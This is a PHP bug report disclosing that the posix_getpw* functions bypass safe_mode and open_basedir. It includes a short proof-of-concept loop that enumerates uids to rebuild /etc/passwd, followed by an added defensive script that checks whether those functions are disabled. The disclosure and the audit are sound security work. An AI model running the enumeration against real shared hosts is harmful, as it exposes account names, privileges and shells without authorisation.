From: [EMAIL PROTECTED]
Operating system: Unix
PHP version: 4.2.0
PHP Bug Type: *General Issues
Bug description: posix_getpw* bypasses safe_mode and open_basedir
I noticed that many of the posix_* functions DO NOT check whether safe_mode
or open_basedir restrict access to the user database, thus allowing a user
to rebuild a complete /etc/passwd without permissions to read /etc/passwd
or access the /etc directory.
This is dangerous in some cases where logins are kept secret, as it allows a
user to know what accounts have what privileges and what accounts have
access to a shell or not.
For now there is only one thing to do, disable these functions, but I'm
pretty sure that adding checks to see values of safe_mode and/or
open_basedir would be a nice thing to do.
Here's a script that rebuilds /etc/passwd when safe_mode is enabled and
open_basedir is set to the user's home directory:
<?php
// Walk the uid range and print a passwd-style line for every uid that resolves.
for ($i = 0; $i < 60000; $i++)
{
    if (($tab = @posix_getpwuid($i)) != NULL)
    {
        echo $tab['name'].":";
        echo $tab['passwd'].":";
        echo $tab['uid'].":";
        echo $tab['gid'].":";
        echo $tab['gecos'].":";
        echo $tab['dir'].":";
        echo $tab['shell']."<br>";
    }
}
?>
On a very large system, if an execution time is set, this will not finish,
but hopefully the posix_getpwent() function is missing, so the user has to
go through all possible uids.
--
Edit bug report at http://bugs.php.net/?id=16733&edit=1
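The workaround named in the report, disabling these functions, can be verified with a check like the one below. It is an added example, not part of the original report or of PHP itself; the list of functions audited (including the posix_getgr* group lookups) and the helper names audit_posix_lookups and ini_flag are assumptions.

```php
<?php
// Added example, not code from the report or from PHP itself.
// Assumption: this list of user/group database lookups is the set to audit.
$lookups = array('posix_getpwuid', 'posix_getpwnam',
                 'posix_getgrgid', 'posix_getgrnam');

// Return the lookups that exist and are not named in disable_functions.
// $disabledIni is the raw comma-separated ini value.
function audit_posix_lookups(array $lookups, $disabledIni)
{
    $disabled = array_filter(array_map('trim',
        explode(',', strtolower($disabledIni))));
    $exposed = array();
    foreach ($lookups as $fn) {
        // Before PHP 8, function_exists() still reports functions named in
        // disable_functions, so the ini list is checked as well.
        if (function_exists($fn) && !in_array(strtolower($fn), $disabled, true)) {
            $exposed[] = $fn;
        }
    }
    return $exposed;
}

// Treat the usual ini spellings of "enabled" as true.
function ini_flag($name)
{
    return in_array(strtolower((string) ini_get($name)),
                    array('1', 'on', 'true', 'yes'), true);
}

$basedir    = (string) ini_get('open_basedir');
$restricted = $basedir !== '' || ini_flag('safe_mode');
$exposed    = audit_posix_lookups($lookups, (string) ini_get('disable_functions'));

echo 'open_basedir: ', ($basedir !== '' ? $basedir : '(unset)'), "\n";
echo 'safe_mode:    ', (ini_flag('safe_mode') ? 'on' : 'off'), "\n";
foreach ($lookups as $fn) {
    echo str_pad($fn, 16), (in_array($fn, $exposed, true) ? 'CALLABLE' : 'blocked'), "\n";
}

// Fail (exit 1) only when a restriction is configured yet lookups still work.
if ($restricted && $exposed) {
    echo "Restricted configuration, but the user database is still readable.\n";
    exit(1);
}
exit(0);
```

Run it under the same SAPI and configuration that serves the restricted users; the command-line binary may load a different php.ini than the web server module.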